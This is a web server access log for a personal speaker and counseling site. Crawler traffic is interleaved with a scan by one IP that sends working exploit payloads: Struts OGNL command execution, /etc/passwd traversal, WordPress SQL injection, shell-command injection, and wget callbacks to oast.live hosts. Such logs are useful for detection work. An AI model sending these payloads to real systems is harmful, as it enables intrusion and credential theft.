147.182.222.20 - - [07/Dec/2022:23:33:56 -0800] "GET /login.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:23:33:59 -0800] "GET /index.action?redirectAction%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1" 404 88 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:23:36:52 -0800] "POST /ztp/cgi-bin/handler HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
185.191.171.22 - - [07/Dec/2022:23:44:31 -0800] "GET /robots.txt HTTP/1.1" 200 73 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)" "mikemarino.us"
185.191.171.40 - - [07/Dec/2022:23:44:31 -0800] "GET / HTTP/1.1" 200 4548 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)" "mikemarino.us"
147.182.222.20 - - [07/Dec/2022:23:48:18 -0800] "GET /login/ HTTP/1.1" 404 88 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:23:50:33 -0800] "POST /wp-admin/admin-ajax.php?action=uploadFontIcon HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:23:50:37 -0800] "GET /wp-content/uploads/kaswara/fonts_icon/ztzjdu/gb.php HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:23:54:57 -0800] "GET /wp-content/plugins/usc-e-shop/functions/progress-check.php?progressfile=../../../../../../../../../../../../../etc/passwd HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [08/Dec/2022:00:00:37 -0800] "POST /./RestAPI/LogonCustomization HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [08/Dec/2022:00:00:41 -0800] "POST /./RestAPI/LogonCustomization HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [08/Dec/2022:00:00:44 -0800] "POST /./RestAPI/Connection HTTP/1.1" 404 88 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [08/Dec/2022:00:00:48 -0800] "GET /help/admin-guide/test.jsp HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [08/Dec/2022:00:01:38 -0800] "POST /dologin.action HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
51.222.253.7 - - [08/Dec/2022:00:01:48 -0800] "GET /home HTTP/1.1" 200 4548 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)" "mikemarino.us"
147.182.222.20 - - [08/Dec/2022:00:02:18 -0800] "GET /cgi-bin/login?LD_DEBUG=files HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [08/Dec/2022:00:02:23 -0800] "GET /?rest_route=/wpgmza/v1/markers&filter=%7b%7d&fields=%2a%20from%20wp_users--%20- HTTP/1.1" 200 4548 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [08/Dec/2022:00:02:34 -0800] "POST /carbon/generic/save_artifact_ajaxprocessor.jsp HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [08/Dec/2022:00:02:49 -0800] "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22 HTTP/1.1" 404 88 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [08/Dec/2022:00:03:01 -0800] "POST /EemAdminService/EemAdmin HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
77.75.79.119 - - [08/Dec/2022:00:07:39 -0800] "GET /robots.txt HTTP/1.1" 200 73 "-" "Mozilla/5.0 (compatible; SeznamBot/4.0-RC1; +http://napoveda.seznam.cz/seznambot-intro/)" "mikemarino.us"
77.75.79.31 - - [08/Dec/2022:00:07:39 -0800] "GET /helpful_tips/what_husbands_really_need_from_their_wives HTTP/1.1" 200 7310 "-" "Mozilla/5.0 (compatible; SeznamBot/4.0-RC1; +http://napoveda.seznam.cz/seznambot-intro/)" "mikemarino.us"
147.182.222.20 - - [08/Dec/2022:00:15:29 -0800] "GET /images/icons_title.gif HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [08/Dec/2022:00:15:36 -0800] "GET /images/icons_title.gif HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
64.124.8.33 - - [08/Dec/2022:00:20:19 -0800] "GET /robots.txt HTTP/1.1" 200 73 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36" "mikemarino.us"
64.124.8.33 - - [08/Dec/2022:00:20:19 -0800] "GET /speaker/the_power_of_pain HTTP/1.1" 200 4796 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36" "mikemarino.us"
147.182.222.20 - - [08/Dec/2022:00:20:32 -0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
120.244.123.131 - - [08/Dec/2022:00:25:34 -0800] "GET /robots.txt HTTP/1.1" 200 73 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" "www.mikemarino.us"
147.182.222.20 - - [08/Dec/2022:00:27:09 -0800] "POST / HTTP/1.1" 200 4548 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [08/Dec/2022:00:27:13 -0800] "GET /wp-admin/index.php HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [08/Dec/2022:00:28:50 -0800] "GET /%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bwget,http://ce8hcsnmqs0tn2g000107wms9o8tny71i.oast.live%7D;%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bwget,http://ce8hcsnmqs0tn2g00010r4dj3saqugi77.oast.live%7D;?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [08/Dec/2022:00:28:54 -0800] "GET /%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BFd%B8%06%08;%7Bwget,http://ce8hcsnmqs0tn2g00010meichjgjx36d7.oast.live%7D;%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BFd%B8%06%08;%7Bwget,http://ce8hcsnmqs0tn2g00010nd9aqzo5wxijj.oast.live%7D;?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [08/Dec/2022:00:32:08 -0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [08/Dec/2022:00:32:11 -0800] "GET /wp-content/plugins/arprice-responsive-pricing-table/js/arprice.js HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
64.124.8.33 - - [08/Dec/2022:00:32:59 -0800] "GET /robots.txt HTTP/1.1" 200 73 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36" "mikemarino.us"
64.124.8.33 - - [08/Dec/2022:00:32:59 -0800] "GET /helpful_tips/what_wives_really_need_from_their_husbands HTTP/1.1" 200 6197 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36" "mikemarino.us"
147.182.222.20 - - [08/Dec/2022:00:33:59 -0800] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 88 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [08/Dec/2022:00:34:03 -0800] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 88 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [08/Dec/2022:00:38:58 -0800] "PUT /fileserver/test.txt HTTP/1.1" 403 170 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [08/Dec/2022:00:39:02 -0800] "GET /fileserver/test.txt HTTP/1.1" 404 88 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [08/Dec/2022:00:39:12 -0800] "POST /sitecore/shell/ClientBin/Reporting/Report.ashx HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
64.124.8.33 - - [08/Dec/2022:00:45:15 -0800] "GET /speaker/facing_change_-_what_to_learn_what_to_do_and_who_to_become HTTP/1.1" 200 4714 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36" "mikemarino.us"
147.182.222.20 - - [08/Dec/2022:00:46:11 -0800] "GET /install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23 HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
64.124.8.33 - - [08/Dec/2022:00:46:35 -0800] "GET /speaker/building_healthy_relationships HTTP/1.1" 200 4752 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36" "mikemarino.us"
147.182.222.20 - - [08/Dec/2022:00:46:56 -0800] "GET /rest/v1/AccountService/Accounts HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [08/Dec/2022:00:47:09 -0800] "GET /manage/fileDownloader?sec=1 HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [08/Dec/2022:00:47:15 -0800] "GET /index.php/catalogsearch/advanced/result/?name=e HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [08/Dec/2022:00:47:26 -0800] "POST /network_test.php HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [08/Dec/2022:00:47:55 -0800] "GET /index.php?rest_route=/xs-donate-form/payment-redirect/3 HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
118.184.177.9 - - [08/Dec/2022:00:54:06 -0800] "GET / HTTP/1.1" 200 4548 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "www.mikemarino.us"
185.191.171.2 - - [08/Dec/2022:00:54:49 -0800] "GET /robots.txt HTTP/1.1" 200 73 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)" "www.mikemarino.us"
185.191.171.25 - - [08/Dec/2022:00:54:50 -0800] "GET /helpful_tips/what_wives_really_need_from_their_husbands HTTP/1.1" 200 6197 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)" "www.mikemarino.us"
216.244.66.240 - - [08/Dec/2022:00:56:02 -0800] "GET /robots.txt HTTP/1.1" 200 59 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" "www.mikemarino.us"
147.182.222.20 - - [08/Dec/2022:00:56:44 -0800] "POST /webadmin/auth/verification.php HTTP/1.1" 404 88 "https://mikemarino.us.p9.hostingprod.com/webadmin/start/" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
51.222.253.10 - - [08/Dec/2022:00:57:38 -0800] "GET /helpful_tips/navigating_through_lifes_storms HTTP/1.1" 200 6172 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)" "www.mikemarino.us"
147.182.222.20 - - [08/Dec/2022:00:58:38 -0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [08/Dec/2022:00:58:42 -0800] "GET /wp-admin/admin-ajax.php?action=easync_success_and_save HTTP/1.1" 404 88 "-" "Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [08/Dec/2022:01:00:45 -0800] "POST /_ignition/execute-solution HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [08/Dec/2022:01:00:49 -0800] "POST /_ignition/execute-solution HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [08/Dec/2022:01:00:53 -0800] "POST /_ignition/execute-solution HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [08/Dec/2022:01:00:56 -0800] "POST /_ignition/execute-solution HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [08/Dec/2022:01:01:00 -0800] "POST /_ignition/execute-solution HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [08/Dec/2022:01:01:07 -0800] "POST /_ignition/execute-solution HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [08/Dec/2022:01:03:41 -0800] "POST /actuator/gateway/routes/2IbagoYe5AZUgeFSPmDMEsMNqgl HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [08/Dec/2022:01:03:45 -0800] "POST /actuator/gateway/refresh HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
185.191.171.10 - - [08/Dec/2022:02:23:14 -0800] "GET /robots.txt HTTP/1.1" 200 73 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)" "www.mikemarino.us"
185.191.171.26 - - [08/Dec/2022:02:23:15 -0800] "GET /home HTTP/1.1" 200 4548 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)" "www.mikemarino.us"
51.222.253.18 - - [08/Dec/2022:02:24:51 -0800] "GET /speaker HTTP/1.1" 200 4630 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)" "mikemarino.us"
95.163.255.198 - - [08/Dec/2022:02:32:00 -0800] "GET /robots.txt HTTP/1.1" 200 59 "-" "Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/Robots/2.0; +https://help.mail.ru/webmaster/indexing/robots)" "www.mikemarino.us"
95.163.255.140 - - [08/Dec/2022:02:32:56 -0800] "GET / HTTP/1.1" 200 4548 "-" "Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/Robots/2.0; +https://help.mail.ru/webmaster/indexing/robots)" "www.mikemarino.us"
185.191.171.34 - - [08/Dec/2022:02:40:27 -0800] "GET /speaker/high_higher_highest_-_recovery_that_works_ideai_for_12-step_recovery_groups HTTP/1.1" 200 4807 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)" "www.mikemarino.us"
40.77.167.102 - - [08/Dec/2022:02:56:26 -0800] "GET /robots.txt HTTP/1.1" 200 73 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36" "www.mikemarino.us"
114.119.149.254 - - [08/Dec/2022:03:16:50 -0800] "GET /speaker/managing_workplace_stress__conflict HTTP/1.1" 200 5764 "https://www.mikemarino.us/speaker/marriage_911" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "www.mikemarino.us"
216.244.66.240 - - [08/Dec/2022:03:17:48 -0800] "GET /robots.txt HTTP/1.1" 200 59 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" "www.mikemarino.us"
114.119.128.46 - - [08/Dec/2022:03:18:57 -0800] "GET /speaker/breaking_the_power_of_addiction HTTP/1.1" 200 4778 "https://www.mikemarino.us/speaker/marriage_911" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "www.mikemarino.us"
64.124.8.35 - - [08/Dec/2022:03:36:07 -0800] "GET /robots.txt HTTP/1.1" 200 73 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36" "mikemarino.us"
64.124.8.35 - - [08/Dec/2022:03:36:08 -0800] "GET /speaker/managing_workplace_stress__conflict HTTP/1.1" 200 5764 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36" "mikemarino.us"
64.124.8.35 - - [08/Dec/2022:03:41:36 -0800] "GET /helpful_tips/what_wives_really_need_from_their_husbands HTTP/1.1" 200 6197 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36" "mikemarino.us"
64.124.8.24 - - [08/Dec/2022:04:17:02 -0800] "GET /robots.txt HTTP/1.1" 200 73 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36" "www.mikemarino.us"
64.124.8.24 - - [08/Dec/2022:04:17:02 -0800] "GET /private_counseling HTTP/1.1" 200 4498 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36" "www.mikemarino.us"
185.191.171.15 - - [08/Dec/2022:04:32:42 -0800] "GET /robots.txt HTTP/1.1" 200 73 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)" "mikemarino.us"
185.191.171.42 - - [08/Dec/2022:04:32:42 -0800] "GET /helpful_tips/battling_anxiety__depression HTTP/1.1" 200 7966 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)" "mikemarino.us"
114.119.141.119 - - [08/Dec/2022:04:32:47 -0800] "GET /speaker/addictions_-_from_heartbreak_to_hope_galafundraising_keynote HTTP/1.1" 200 5802 "https://www.mikemarino.us/speaker/marriage_911" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "www.mikemarino.us"
64.124.8.26 - - [08/Dec/2022:04:48:23 -0800] "GET /robots.txt HTTP/1.1" 200 73 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36" "mikemarino.us"
64.124.8.26 - - [08/Dec/2022:04:48:24 -0800] "GET /robots.txt HTTP/1.1" 200 73 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36" "mikemarino.us"
